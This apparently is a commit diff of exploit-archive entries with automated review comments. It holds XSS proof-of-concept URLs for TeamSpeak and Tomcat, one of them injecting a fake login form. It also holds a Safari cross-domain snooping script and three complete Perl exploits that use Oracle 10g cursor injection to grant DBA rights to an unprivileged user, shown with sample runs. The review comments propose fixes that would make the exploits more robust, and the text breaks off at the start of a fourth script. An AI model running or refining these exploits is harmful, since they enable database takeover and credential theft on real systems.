Exploiting this issue allows local attackers to bypass protection mechanisms implemented to restrict access to the memory space of critical processes. This allows attackers to execute arbitrary code with elevated privileges; other attacks are also possible.
The following applications are vulnerable to this issue:
- Comodo Firewall Pro 2.4.18.184
- Comodo Personal Firewall 2.3.6.81
- ZoneAlarm Pro 6.1.744.001
Other applications and versions may also be affected.
http://www.exploit-db.com/sploits/30039-1.zip
http://www.exploit-db.com/sploits/30039-2.zip
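Review bot: unlike the other files added in this commit, this entry has no title, author or date line and says nothing about what `30039-1.zip` and `30039-2.zip` contain; add a one-line description of each archive (and the credit from the securityfocus entry) so the advisory is usable without downloading and opening the binaries.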


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/23933/info
TeamSpeak Server is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
TeamSpeak Server 2.0.20.1 is vulnerable; other versions may also be affected.
http://www.example.com:14534/error_box.html?error_title=session expired - please login&error_text=<form action="http://127.0.0.1:31338/own.cgi">User:<inputtype="text"><br>Pass: <input type="password"><br><br><input type="submit"></form>&error_url=index.html http://www.example.com:14534/ok_box.html?ok_title=%3Cscript%3Ealert('hello')%3C/script%3E
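Review bot: the two PoC URLs have been run together onto a single line; put each on its own line so that the `error_box.html` and `ok_box.html` cases are distinguishable and individually copyable. The first is given unencoded while the second is percent-encoded; pick one form for both so readers (and anyone writing a log signature for the `error_title`/`error_text`/`ok_title` parameters) are not left guessing which encoding the server accepts.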


@ -0,0 +1,15 @@
source: http://www.securityfocus.com/bid/24058/info
Apache Tomcat's documentation web application includes a sample application that is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
The following Tomcat versions are affected:
4.0.0 to 4.0.6
4.1.0 to 4.1.36
5.0.0 to 5.0.30
5.5.0 to 5.5.23
6.0.0 to 6.0.10
http://www.example.com/tomcat-docs/appdev/sample/web/hello.jsp?test=<script>alert(document.domain)</script>


@ -0,0 +1,20 @@
source: http://www.securityfocus.com/bid/24121/info
Apple Safari is prone to an information-disclosure vulnerability because it fails to properly enforce cross-domain JavaScript restrictions.
Exploiting this issue may allow attackers to access locations that a user visits, even if it's in a different domain than the attacker's site. The most common manifestation of this condition would typically be in blogs or forums. Attackers may be able to access potentially sensitive information that would aid in phishing attacks.
This issue affects Safari 2.0.4; other versions may also be affected.
var snoopWin;
function run() {
snoopWin = window.open('http://www.google.com/','snoopWindow','width=640,height=480');
snoopWin.blur();
setTimeout("snoopy()", 5000);
}
function snoopy() {
alert(snoopWin.location);
setTimeout("snoopy()", 5000);
}
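Review bot: the JavaScript is dropped in bare after the advisory text, with no indentation and none of the title/author/date header lines the other new files in this commit carry; add the header and indent the bodies of `run()` and `snoopy()` so the snippet is recognisable as code rather than a continuation of the prose.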


@ -1,140 +1,140 @@
#!/usr/bin/perl #!/usr/bin/perl
# #
# Remote Oracle KUPW$WORKER.MAIN exploit (10g) # Remote Oracle KUPW$WORKER.MAIN exploit (10g)
# - Version 2 - New "evil cursor injection" tip! # - Version 2 - New "evil cursor injection" tip!
# - No "create procedure" privileg needed! # - No "create procedure" privileg needed!
# - See: http://www.databasesecurity.com/ (Cursor Injection) # - See: http://www.databasesecurity.com/ (Cursor Injection)
# #
# Grant or revoke dba permission to unprivileged user # Grant or revoke dba permission to unprivileged user
# #
# Tested on "Oracle Database 10g Enterprise Edition Release 10.1.0.3.0" # Tested on "Oracle Database 10g Enterprise Edition Release 10.1.0.3.0"
# #
# REF: http://www.securityfocus.com/archive/1/440439 # REF: http://www.securityfocus.com/archive/1/440439
# #
# AUTHOR: Andrea "bunker" Purificato # AUTHOR: Andrea "bunker" Purificato
# http://rawlab.mindcreations.com # http://rawlab.mindcreations.com
# #
# DATE: Copyright 2007 - Thu Feb 26 17:48:27 CET 2007 # DATE: Copyright 2007 - Thu Feb 26 17:48:27 CET 2007
# #
# Oracle InstantClient (basic + sdk) required for DBD::Oracle # Oracle InstantClient (basic + sdk) required for DBD::Oracle
# #
# #
# bunker@fin:~$ perl kupw-workerV2.pl -h localhost -s test -u bunker -p **** -r # bunker@fin:~$ perl kupw-workerV2.pl -h localhost -s test -u bunker -p **** -r
# [-] Wait... # [-] Wait...
# [-] Revoking DBA from BUNKER... # [-] Revoking DBA from BUNKER...
# DBD::Oracle::db do failed: ORA-01031: insufficient privileges (DBD ERROR: OCIStmtExecute) [for Statement "REVOKE DBA FROM BUNKER"] at kupw-workerV2.pl line 70. # DBD::Oracle::db do failed: ORA-01031: insufficient privileges (DBD ERROR: OCIStmtExecute) [for Statement "REVOKE DBA FROM BUNKER"] at kupw-workerV2.pl line 70.
# [-] Done! # [-] Done!
# #
# bunker@fin:~$ perl kupw-workerV2.pl -h localhost -s test -u bunker -p **** -g # bunker@fin:~$ perl kupw-workerV2.pl -h localhost -s test -u bunker -p **** -g
# [-] Wait... # [-] Wait...
# [-] Creating evil cursor... # [-] Creating evil cursor...
# Cursor: 2 # Cursor: 2
# [-] Go ...(don't worry about errors)! # [-] Go ...(don't worry about errors)!
# DBD::Oracle::st execute failed: ORA-39079: unable to enqueue message DG # DBD::Oracle::st execute failed: ORA-39079: unable to enqueue message DG
# ORA-06512: at "SYS.DBMS_SYS_ERROR", line 86 # ORA-06512: at "SYS.DBMS_SYS_ERROR", line 86
# ORA-06512: at "SYS.KUPC$QUE_INT", line 912 # ORA-06512: at "SYS.KUPC$QUE_INT", line 912
# ORA-00931: missing identifier # ORA-00931: missing identifier
# ORA-06512: at "SYS.KUPC$QUE_INT", line 1910 # ORA-06512: at "SYS.KUPC$QUE_INT", line 1910
# ORA-06512: at line 1 # ORA-06512: at line 1
# ORA-06512: at "SYS.KUPC$QUEUE_INT", line 591 # ORA-06512: at "SYS.KUPC$QUEUE_INT", line 591
# ORA-06512: at "SYS.KUPW$WORKER", line 13468 # ORA-06512: at "SYS.KUPW$WORKER", line 13468
# ORA-06512: at "SYS.KUPW$WORKER", line 5810 # ORA-06512: at "SYS.KUPW$WORKER", line 5810
# ORA-39125: Worker unexpected fatal error in KUPW$WORKER.MAIN while calling KUPC$QUEUE_INT.ATTACH_QUEUE [] # ORA-39125: Worker unexpected fatal error in KUPW$WORKER.MAIN while calling KUPC$QUEUE_INT.ATTACH_QUEUE []
# ORA-06512: at "SYS.KUPW$WORKER", line 1243 # ORA-06512: at "SYS.KUPW$WORKER", line 1243
# ORA-31626: job does not exist # ORA-31626: job does not exist
# ORA-39086: cannot retrieve job information # ORA-39086: cannot retrieve job information
# ORA-06512: at line 3 (DBD ERROR: OCIStmtExecute) [for Statement " # ORA-06512: at line 3 (DBD ERROR: OCIStmtExecute) [for Statement "
# BEGIN # BEGIN
# SYS.KUPW$WORKER.MAIN(''' AND 0=dbms_sql.execute(2)--',''); # SYS.KUPW$WORKER.MAIN(''' AND 0=dbms_sql.execute(2)--','');
# END; # END;
# "] at kupw-workerV2.pl line 100. # "] at kupw-workerV2.pl line 100.
# [-] YOU GOT THE POWAH!! # [-] YOU GOT THE POWAH!!
# #
# bunker@fin:~$ perl kupw-workerV2.pl -h localhost -s test -u bunker -p **** -r # bunker@fin:~$ perl kupw-workerV2.pl -h localhost -s test -u bunker -p **** -r
# [-] Wait... # [-] Wait...
# [-] Revoking DBA from BUNKER... # [-] Revoking DBA from BUNKER...
# [-] Done! # [-] Done!
# #
use warnings; use warnings;
use strict; use strict;
use DBI; use DBI;
use Getopt::Std; use Getopt::Std;
use vars qw/ %opt /; use vars qw/ %opt /;
sub usage { sub usage {
print <<"USAGE"; print <<"USAGE";
Syntax: $0 -h <host> -s <sid> -u <user> -p <passwd> -g|-r [-P <port>] Syntax: $0 -h <host> -s <sid> -u <user> -p <passwd> -g|-r [-P <port>]
Options: Options:
-h <host> target server address -h <host> target server address
-s <sid> target sid name -s <sid> target sid name
-u <user> user -u <user> user
-p <passwd> password -p <passwd> password
-g|-r (g)rant dba to user | (r)evoke dba from user -g|-r (g)rant dba to user | (r)evoke dba from user
[-P <port> Oracle port] [-P <port> Oracle port]
USAGE USAGE
exit 0 exit 0
} }
my $opt_string = 'h:s:u:p:grP:'; my $opt_string = 'h:s:u:p:grP:';
getopts($opt_string, \%opt) or &usage; getopts($opt_string, \%opt) or &usage;
&usage if ( !$opt{h} or !$opt{s} or !$opt{u} or !$opt{p} ); &usage if ( !$opt{h} or !$opt{s} or !$opt{u} or !$opt{p} );
&usage if ( !$opt{g} and !$opt{r} ); &usage if ( !$opt{g} and !$opt{r} );
my $user = uc $opt{u}; my $user = uc $opt{u};
my $dbh = undef; my $dbh = undef;
if ($opt{P}) { if ($opt{P}) {
$dbh = DBI->connect("dbi:Oracle:host=$opt{h};sid=$opt{s};port=$opt{P}", $opt{u}, $opt{p}) or die; $dbh = DBI->connect("dbi:Oracle:host=$opt{h};sid=$opt{s};port=$opt{P}", $opt{u}, $opt{p}) or die;
} else { } else {
$dbh = DBI->connect("dbi:Oracle:host=$opt{h};sid=$opt{s}", $opt{u}, $opt{p}) or die; $dbh = DBI->connect("dbi:Oracle:host=$opt{h};sid=$opt{s}", $opt{u}, $opt{p}) or die;
} }
my $sqlcmd = "GRANT DBA TO $user"; my $sqlcmd = "GRANT DBA TO $user";
print "[-] Wait...\n"; print "[-] Wait...\n";
$dbh->func( 1000000, 'dbms_output_enable' ); $dbh->func( 1000000, 'dbms_output_enable' );
if ($opt{r}) { if ($opt{r}) {
print "[-] Revoking DBA from $user...\n"; print "[-] Revoking DBA from $user...\n";
$sqlcmd = "REVOKE DBA FROM $user"; $sqlcmd = "REVOKE DBA FROM $user";
$dbh->do( $sqlcmd ); $dbh->do( $sqlcmd );
print "[-] Done!\n"; print "[-] Done!\n";
$dbh->disconnect; $dbh->disconnect;
exit; exit;
} }
print "[-] Creating evil cursor...\n"; print "[-] Creating evil cursor...\n";
my $sth = $dbh->prepare(qq{ my $sth = $dbh->prepare(qq{
DECLARE DECLARE
MYC NUMBER; MYC NUMBER;
BEGIN BEGIN
MYC := DBMS_SQL.OPEN_CURSOR; MYC := DBMS_SQL.OPEN_CURSOR;
DBMS_SQL.PARSE(MYC,'declare pragma autonomous_transaction; begin execute immediate ''$sqlcmd'';commit;end;',0); DBMS_SQL.PARSE(MYC,'declare pragma autonomous_transaction; begin execute immediate ''$sqlcmd'';commit;end;',0);
DBMS_OUTPUT.PUT_LINE('Cursor: '||MYC); DBMS_OUTPUT.PUT_LINE('Cursor: '||MYC);
END; END;
} ); } );
$sth->execute; $sth->execute;
my $cursor = undef; my $cursor = undef;
while (my $line = $dbh->func( 'dbms_output_get' )) { while (my $line = $dbh->func( 'dbms_output_get' )) {
print "$line\n"; print "$line\n";
if ($line =~ /^Cursor: (\d)/) {$cursor = $1;} if ($line =~ /^Cursor: (\d)/) {$cursor = $1;}
} }
$sth->finish; $sth->finish;
print "[-] Go ...(don't worry about errors)!\n"; print "[-] Go ...(don't worry about errors)!\n";
$sth = $dbh->prepare(qq{ $sth = $dbh->prepare(qq{
BEGIN BEGIN
SYS.KUPW\$WORKER.MAIN(''' AND 0=dbms_sql.execute($cursor)--',''); SYS.KUPW\$WORKER.MAIN(''' AND 0=dbms_sql.execute($cursor)--','');
END; END;
}); });
$sth->execute; $sth->execute;
$sth->finish; $sth->finish;
print "[-] YOU GOT THE POWAH!!\n"; print "[-] YOU GOT THE POWAH!!\n";
$dbh->disconnect; $dbh->disconnect;
exit; exit;
# milw0rm.com [2007-02-26] # milw0rm.com [2007-02-26]
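Review bot: the cursor-id capture `if ($line =~ /^Cursor: (\d)/) {$cursor = $1;}` matches a single digit only, so a handle of 10 or more would be truncated and the later `dbms_sql.execute($cursor)` would refer to a different cursor; `(\d+)` is the intended pattern. Related: when no "Cursor:" line is read back, $cursor stays undef and the qq{} interpolation silently produces `dbms_sql.execute()` with nothing but an "uninitialized value" warning; the script should die before the second prepare if $cursor is not set. Typo in the header comment: "privileg" should read "privilege" (the KUPM$MCP.MAIN entry in this commit already spells it that way).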

@ -1,136 +1,136 @@
#!/usr/bin/perl #!/usr/bin/perl
# #
# Remote Oracle KUPV$FT.ATTACH_JOB exploit (10g) # Remote Oracle KUPV$FT.ATTACH_JOB exploit (10g)
# - Version 2 - New "evil cursor injection" tip! # - Version 2 - New "evil cursor injection" tip!
# - No "create procedure" privileg needed! # - No "create procedure" privileg needed!
# - See: http://www.databasesecurity.com/ (Cursor Injection) # - See: http://www.databasesecurity.com/ (Cursor Injection)
# #
# Grant or revoke dba permission to unprivileged user # Grant or revoke dba permission to unprivileged user
# #
# Tested on "Oracle Database 10g Enterprise Edition Release 10.1.0.3.0" # Tested on "Oracle Database 10g Enterprise Edition Release 10.1.0.3.0"
# #
# REF: http://www.securityfocus.com/bid/16294 # REF: http://www.securityfocus.com/bid/16294
# #
# AUTHOR: Andrea "bunker" Purificato # AUTHOR: Andrea "bunker" Purificato
# http://rawlab.mindcreations.com # http://rawlab.mindcreations.com
# #
# DATE: Copyright 2007 - Thu Feb 26 17:18:55 CET 2007 # DATE: Copyright 2007 - Thu Feb 26 17:18:55 CET 2007
# #
# Oracle InstantClient (basic + sdk) required for DBD::Oracle # Oracle InstantClient (basic + sdk) required for DBD::Oracle
# #
# bunker@fin:~$ perl kupv-ft_attach_jobV2.pl -h localhost -s test -u bunker -p **** -r # bunker@fin:~$ perl kupv-ft_attach_jobV2.pl -h localhost -s test -u bunker -p **** -r
# [-] Wait... # [-] Wait...
# [-] Revoking DBA from BUNKER... # [-] Revoking DBA from BUNKER...
# DBD::Oracle::db do failed: ORA-01031: insufficient privileges (DBD ERROR: OCIStmtExecute) [for Statement "REVOKE DBA FROM BUNKER"] at kupv-ft_attach_jobV2.pl line 68. # DBD::Oracle::db do failed: ORA-01031: insufficient privileges (DBD ERROR: OCIStmtExecute) [for Statement "REVOKE DBA FROM BUNKER"] at kupv-ft_attach_jobV2.pl line 68.
# [-] Done! # [-] Done!
# #
# bunker@fin:~$ perl kupv-ft_attach_jobV2.pl -h localhost -s test -u bunker -p **** -g # bunker@fin:~$ perl kupv-ft_attach_jobV2.pl -h localhost -s test -u bunker -p **** -g
# [-] Wait... # [-] Wait...
# [-] Creating evil cursor... # [-] Creating evil cursor...
# Cursor: 2 # Cursor: 2
# [-] Go ...(don't worry about errors)! # [-] Go ...(don't worry about errors)!
# DBD::Oracle::st execute failed: ORA-31626: job does not exist # DBD::Oracle::st execute failed: ORA-31626: job does not exist
# ORA-06512: at "SYS.DBMS_SYS_ERROR", line 79 # ORA-06512: at "SYS.DBMS_SYS_ERROR", line 79
# ORA-06512: at "SYS.KUPV$FT", line 330 # ORA-06512: at "SYS.KUPV$FT", line 330
# ORA-31638: cannot attach to job ' AND 0=dbms_sql.execute(2)-- for user # ORA-31638: cannot attach to job ' AND 0=dbms_sql.execute(2)-- for user
# ORA-31632: master table ".' AND 0=dbms_sql.execute(2)--" not found, invalid, or inaccessible # ORA-31632: master table ".' AND 0=dbms_sql.execute(2)--" not found, invalid, or inaccessible
# ORA-00942: table or view does not exist # ORA-00942: table or view does not exist
# ORA-06512: at line 5 (DBD ERROR: OCIStmtExecute) [for Statement " # ORA-06512: at line 5 (DBD ERROR: OCIStmtExecute) [for Statement "
# DECLARE # DECLARE
# J BOOLEAN; R NUMBER; # J BOOLEAN; R NUMBER;
# BEGIN # BEGIN
# R:=SYS.KUPV$FT.ATTACH_JOB('',''' AND 0=dbms_sql.execute(2)--',J); # R:=SYS.KUPV$FT.ATTACH_JOB('',''' AND 0=dbms_sql.execute(2)--',J);
# END; # END;
# "] at kupv-ft_attach_jobV2.pl line 100. # "] at kupv-ft_attach_jobV2.pl line 100.
# [-] YOU GOT THE POWAH!! # [-] YOU GOT THE POWAH!!
# #
# bunker@fin:~$ perl kupv-ft_attach_jobV2.pl -h localhost -s test -u bunker -p **** -r # bunker@fin:~$ perl kupv-ft_attach_jobV2.pl -h localhost -s test -u bunker -p **** -r
# [-] Wait... # [-] Wait...
# [-] Revoking DBA from BUNKER... # [-] Revoking DBA from BUNKER...
# [-] Done! # [-] Done!
# #
use warnings; use warnings;
use strict; use strict;
use DBI; use DBI;
use Getopt::Std; use Getopt::Std;
use vars qw/ %opt /; use vars qw/ %opt /;
sub usage { sub usage {
print <<"USAGE"; print <<"USAGE";
Syntax: $0 -h <host> -s <sid> -u <user> -p <passwd> -g|-r [-P <port>] Syntax: $0 -h <host> -s <sid> -u <user> -p <passwd> -g|-r [-P <port>]
Options: Options:
-h <host> target server address -h <host> target server address
-s <sid> target sid name -s <sid> target sid name
-u <user> user -u <user> user
-p <passwd> password -p <passwd> password
-g|-r (g)rant dba to user | (r)evoke dba from user -g|-r (g)rant dba to user | (r)evoke dba from user
[-P <port> Oracle port] [-P <port> Oracle port]
USAGE USAGE
exit 0 exit 0
} }
my $opt_string = 'h:s:u:p:grP:'; my $opt_string = 'h:s:u:p:grP:';
getopts($opt_string, \%opt) or &usage; getopts($opt_string, \%opt) or &usage;
&usage if ( !$opt{h} or !$opt{s} or !$opt{u} or !$opt{p} ); &usage if ( !$opt{h} or !$opt{s} or !$opt{u} or !$opt{p} );
&usage if ( !$opt{g} and !$opt{r} ); &usage if ( !$opt{g} and !$opt{r} );
my $user = uc $opt{u}; my $user = uc $opt{u};
my $dbh = undef; my $dbh = undef;
if ($opt{P}) { if ($opt{P}) {
$dbh = DBI->connect("dbi:Oracle:host=$opt{h};sid=$opt{s};port=$opt{P}", $opt{u}, $opt{p}) or die; $dbh = DBI->connect("dbi:Oracle:host=$opt{h};sid=$opt{s};port=$opt{P}", $opt{u}, $opt{p}) or die;
} else { } else {
$dbh = DBI->connect("dbi:Oracle:host=$opt{h};sid=$opt{s}", $opt{u}, $opt{p}) or die; $dbh = DBI->connect("dbi:Oracle:host=$opt{h};sid=$opt{s}", $opt{u}, $opt{p}) or die;
} }
my $sqlcmd = "GRANT DBA TO $user"; my $sqlcmd = "GRANT DBA TO $user";
print "[-] Wait...\n"; print "[-] Wait...\n";
$dbh->func( 1000000, 'dbms_output_enable' ); $dbh->func( 1000000, 'dbms_output_enable' );
if ($opt{r}) { if ($opt{r}) {
print "[-] Revoking DBA from $user...\n"; print "[-] Revoking DBA from $user...\n";
$sqlcmd = "REVOKE DBA FROM $user"; $sqlcmd = "REVOKE DBA FROM $user";
$dbh->do( $sqlcmd ); $dbh->do( $sqlcmd );
print "[-] Done!\n"; print "[-] Done!\n";
$dbh->disconnect; $dbh->disconnect;
exit; exit;
} }
print "[-] Creating evil cursor...\n"; print "[-] Creating evil cursor...\n";
my $sth = $dbh->prepare(qq{ my $sth = $dbh->prepare(qq{
DECLARE DECLARE
MYC NUMBER; MYC NUMBER;
BEGIN BEGIN
MYC := DBMS_SQL.OPEN_CURSOR; MYC := DBMS_SQL.OPEN_CURSOR;
DBMS_SQL.PARSE(MYC,'declare pragma autonomous_transaction; begin execute immediate ''$sqlcmd'';commit;end;',0); DBMS_SQL.PARSE(MYC,'declare pragma autonomous_transaction; begin execute immediate ''$sqlcmd'';commit;end;',0);
DBMS_OUTPUT.PUT_LINE('Cursor: '||MYC); DBMS_OUTPUT.PUT_LINE('Cursor: '||MYC);
END; END;
} ); } );
$sth->execute; $sth->execute;
my $cursor = undef; my $cursor = undef;
while (my $line = $dbh->func( 'dbms_output_get' )) { while (my $line = $dbh->func( 'dbms_output_get' )) {
print "$line\n"; print "$line\n";
if ($line =~ /^Cursor: (\d)/) {$cursor = $1;} if ($line =~ /^Cursor: (\d)/) {$cursor = $1;}
} }
$sth->finish; $sth->finish;
print "[-] Go ...(don't worry about errors)!\n"; print "[-] Go ...(don't worry about errors)!\n";
$sth = $dbh->prepare(qq{ $sth = $dbh->prepare(qq{
DECLARE DECLARE
J BOOLEAN; R NUMBER; J BOOLEAN; R NUMBER;
BEGIN BEGIN
R:=SYS.KUPV\$FT.ATTACH_JOB('',''' AND 0=dbms_sql.execute($cursor)--',J); R:=SYS.KUPV\$FT.ATTACH_JOB('',''' AND 0=dbms_sql.execute($cursor)--',J);
END; END;
}); });
$sth->execute; $sth->execute;
$sth->finish; $sth->finish;
print "[-] YOU GOT THE POWAH!!\n"; print "[-] YOU GOT THE POWAH!!\n";
$dbh->disconnect; $dbh->disconnect;
exit; exit;
# milw0rm.com [2007-02-26] # milw0rm.com [2007-02-26]
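Review bot: in the -r branch the result of `$dbh->do( $sqlcmd );` is never checked and the connect sets no RaiseError, so the script prints "[-] Done!" after a failed REVOKE; the sample session in the header shows exactly that sequence ("ORA-01031: insufficient privileges ... [-] Done!"). Suggest `$dbh->do($sqlcmd) or die $dbh->errstr;` or `RaiseError => 1` in the DBI->connect attributes so the exit status reflects the failure. The bare `or die` on `DBI->connect(...)` likewise gives no reason for a refused connection; `or die $DBI::errstr` would.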

@ -1,134 +1,134 @@
#!/usr/bin/perl #!/usr/bin/perl
# #
# Remote Oracle DBMS_METADATA.GET_DDL exploit (9i/10g) # Remote Oracle DBMS_METADATA.GET_DDL exploit (9i/10g)
# - Version 2 - New "evil cursor injection" tip! # - Version 2 - New "evil cursor injection" tip!
# - No "create procedure" privileg needed! # - No "create procedure" privileg needed!
# - See: http://www.databasesecurity.com/ (Cursor Injection) # - See: http://www.databasesecurity.com/ (Cursor Injection)
# #
# Grant or revoke dba permission to unprivileged user # Grant or revoke dba permission to unprivileged user
# #
# Tested on "Oracle Database 10g Enterprise Edition Release 10.1.0.3.0" # Tested on "Oracle Database 10g Enterprise Edition Release 10.1.0.3.0"
# #
# REF: http://www.securityfocus.com/bid/16287 # REF: http://www.securityfocus.com/bid/16287
# #
# AUTHOR: Andrea "bunker" Purificato # AUTHOR: Andrea "bunker" Purificato
# http://rawlab.mindcreations.com # http://rawlab.mindcreations.com
# #
# DATE: Copyright 2007 - Fri Feb 26 12:32:55 CET 2007 # DATE: Copyright 2007 - Fri Feb 26 12:32:55 CET 2007
# #
# Oracle InstantClient (basic + sdk) required for DBD::Oracle # Oracle InstantClient (basic + sdk) required for DBD::Oracle
# #
# bunker@fin:~$ perl dbms_meta_get_ddlV2.pl -h localhost -s test -u bunker -p **** -r # bunker@fin:~$ perl dbms_meta_get_ddlV2.pl -h localhost -s test -u bunker -p **** -r
# [-] Wait... # [-] Wait...
# [-] Revoking DBA from BUNKER... # [-] Revoking DBA from BUNKER...
# DBD::Oracle::db do failed: ORA-01031: insufficient privileges (DBD ERROR: OCIStmtExecute) [for Statement "REVOKE DBA FROM BUNKER"] at dbms_meta_get_ddlV2.pl line 69. # DBD::Oracle::db do failed: ORA-01031: insufficient privileges (DBD ERROR: OCIStmtExecute) [for Statement "REVOKE DBA FROM BUNKER"] at dbms_meta_get_ddlV2.pl line 69.
# [-] Done! # [-] Done!
# #
# bunker@fin:~$ perl dbms_meta_get_ddlV2.pl -h localhost -s test -u bunker -p **** -g # bunker@fin:~$ perl dbms_meta_get_ddlV2.pl -h localhost -s test -u bunker -p **** -g
# [-] Wait... # [-] Wait...
# [-] Creating evil cursor... # [-] Creating evil cursor...
# Cursor: 2 # Cursor: 2
# [-] Go ...(don't worry about errors)! # [-] Go ...(don't worry about errors)!
# DBD::Oracle::st execute failed: ORA-31600: invalid input value '||dbms_sql.execute(2)||' for parameter OBJECT_TYPE in function GET_DDL # DBD::Oracle::st execute failed: ORA-31600: invalid input value '||dbms_sql.execute(2)||' for parameter OBJECT_TYPE in function GET_DDL
# ORA-06512: at "SYS.DBMS_METADATA", line 2576 # ORA-06512: at "SYS.DBMS_METADATA", line 2576
# ORA-06512: at "SYS.DBMS_METADATA", line 2627 # ORA-06512: at "SYS.DBMS_METADATA", line 2627
# ORA-06512: at "SYS.DBMS_METADATA", line 4220 # ORA-06512: at "SYS.DBMS_METADATA", line 4220
# ORA-06512: at line 5 (DBD ERROR: OCIStmtExecute) [for Statement " # ORA-06512: at line 5 (DBD ERROR: OCIStmtExecute) [for Statement "
# DECLARE # DECLARE
# R CLOB; # R CLOB;
# BEGIN # BEGIN
# R := SYS.DBMS_METADATA.GET_DDL('''||dbms_sql.execute(2)||''',''); # R := SYS.DBMS_METADATA.GET_DDL('''||dbms_sql.execute(2)||''','');
# END; # END;
# "] at dbms_meta_get_ddlV2.pl line 101. # "] at dbms_meta_get_ddlV2.pl line 101.
# [-] YOU GOT THE POWAH!! # [-] YOU GOT THE POWAH!!
# #
# bunker@fin:~$ perl dbms_meta_get_ddlV2.pl -h localhost -s test -u bunker -p **** -r # bunker@fin:~$ perl dbms_meta_get_ddlV2.pl -h localhost -s test -u bunker -p **** -r
# [-] Wait... # [-] Wait...
# [-] Revoking DBA from BUNKER... # [-] Revoking DBA from BUNKER...
# [-] Done! # [-] Done!
# #
use warnings; use warnings;
use strict; use strict;
use DBI; use DBI;
use Getopt::Std; use Getopt::Std;
use vars qw/ %opt /; use vars qw/ %opt /;
sub usage { sub usage {
print <<"USAGE"; print <<"USAGE";
Syntax: $0 -h <host> -s <sid> -u <user> -p <passwd> -g|-r [-P <port>] Syntax: $0 -h <host> -s <sid> -u <user> -p <passwd> -g|-r [-P <port>]
Options: Options:
-h <host> target server address -h <host> target server address
-s <sid> target sid name -s <sid> target sid name
-u <user> user -u <user> user
-p <passwd> password -p <passwd> password
-g|-r (g)rant dba to user | (r)evoke dba from user -g|-r (g)rant dba to user | (r)evoke dba from user
[-P <port> Oracle port] [-P <port> Oracle port]
USAGE USAGE
exit 0 exit 0
} }
my $opt_string = 'h:s:u:p:grP:'; my $opt_string = 'h:s:u:p:grP:';
getopts($opt_string, \%opt) or &usage; getopts($opt_string, \%opt) or &usage;
&usage if ( !$opt{h} or !$opt{s} or !$opt{u} or !$opt{p} ); &usage if ( !$opt{h} or !$opt{s} or !$opt{u} or !$opt{p} );
&usage if ( !$opt{g} and !$opt{r} ); &usage if ( !$opt{g} and !$opt{r} );
my $user = uc $opt{u}; my $user = uc $opt{u};
my $dbh = undef; my $dbh = undef;
if ($opt{P}) { if ($opt{P}) {
$dbh = DBI->connect("dbi:Oracle:host=$opt{h};sid=$opt{s};port=$opt{P}", $opt{u}, $opt{p}) or die; $dbh = DBI->connect("dbi:Oracle:host=$opt{h};sid=$opt{s};port=$opt{P}", $opt{u}, $opt{p}) or die;
} else { } else {
$dbh = DBI->connect("dbi:Oracle:host=$opt{h};sid=$opt{s}", $opt{u}, $opt{p}) or die; $dbh = DBI->connect("dbi:Oracle:host=$opt{h};sid=$opt{s}", $opt{u}, $opt{p}) or die;
} }
my $sqlcmd = "GRANT DBA TO $user"; my $sqlcmd = "GRANT DBA TO $user";
print "[-] Wait...\n"; print "[-] Wait...\n";
$dbh->func( 1000000, 'dbms_output_enable' ); $dbh->func( 1000000, 'dbms_output_enable' );
if ($opt{r}) { if ($opt{r}) {
print "[-] Revoking DBA from $user...\n"; print "[-] Revoking DBA from $user...\n";
$sqlcmd = "REVOKE DBA FROM $user"; $sqlcmd = "REVOKE DBA FROM $user";
$dbh->do( $sqlcmd ); $dbh->do( $sqlcmd );
print "[-] Done!\n"; print "[-] Done!\n";
$dbh->disconnect; $dbh->disconnect;
exit; exit;
} }
print "[-] Creating evil cursor...\n"; print "[-] Creating evil cursor...\n";
my $sth = $dbh->prepare(qq{ my $sth = $dbh->prepare(qq{
DECLARE DECLARE
MYC NUMBER; MYC NUMBER;
BEGIN BEGIN
MYC := DBMS_SQL.OPEN_CURSOR; MYC := DBMS_SQL.OPEN_CURSOR;
DBMS_SQL.PARSE(MYC,'declare pragma autonomous_transaction; begin execute immediate ''$sqlcmd'';commit;end;',0); DBMS_SQL.PARSE(MYC,'declare pragma autonomous_transaction; begin execute immediate ''$sqlcmd'';commit;end;',0);
DBMS_OUTPUT.PUT_LINE('Cursor: '||MYC); DBMS_OUTPUT.PUT_LINE('Cursor: '||MYC);
END; END;
} ); } );
$sth->execute; $sth->execute;
my $cursor = undef; my $cursor = undef;
while (my $line = $dbh->func( 'dbms_output_get' )) { while (my $line = $dbh->func( 'dbms_output_get' )) {
print "$line\n"; print "$line\n";
if ($line =~ /^Cursor: (\d)/) {$cursor = $1;} if ($line =~ /^Cursor: (\d)/) {$cursor = $1;}
} }
$sth->finish; $sth->finish;
print "[-] Go ...(don't worry about errors)!\n"; print "[-] Go ...(don't worry about errors)!\n";
$sth = $dbh->prepare(qq{ $sth = $dbh->prepare(qq{
DECLARE DECLARE
R CLOB; R CLOB;
BEGIN BEGIN
R := SYS.DBMS_METADATA.GET_DDL('''||dbms_sql.execute($cursor)||''',''); R := SYS.DBMS_METADATA.GET_DDL('''||dbms_sql.execute($cursor)||''','');
END; END;
}); });
$sth->execute; $sth->execute;
$sth->finish; $sth->finish;
print "[-] YOU GOT THE POWAH!!\n"; print "[-] YOU GOT THE POWAH!!\n";
$dbh->disconnect; $dbh->disconnect;
exit; exit;
# milw0rm.com [2007-02-26] # milw0rm.com [2007-02-26]
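Review bot: the DATE header reads "Fri Feb 26 12:32:55 CET 2007", while the KUPW$WORKER and KUPV$FT entries in this commit give the same date as "Thu Feb 26" and the DBMS_CDC_SUBSCRIBE entry as "Mon Feb 26"; 26 February 2007 was a Monday, so the weekday here (and in the two "Thu" entries) is wrong and should be corrected or dropped. Documentation point: the title claims "(9i/10g)" but the "Tested on" line names only "Oracle Database 10g Enterprise Edition Release 10.1.0.3.0"; the 9i claim should either cite the REF that supports it or be marked untested.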

@ -1,129 +1,129 @@
#!/usr/bin/perl #!/usr/bin/perl
# #
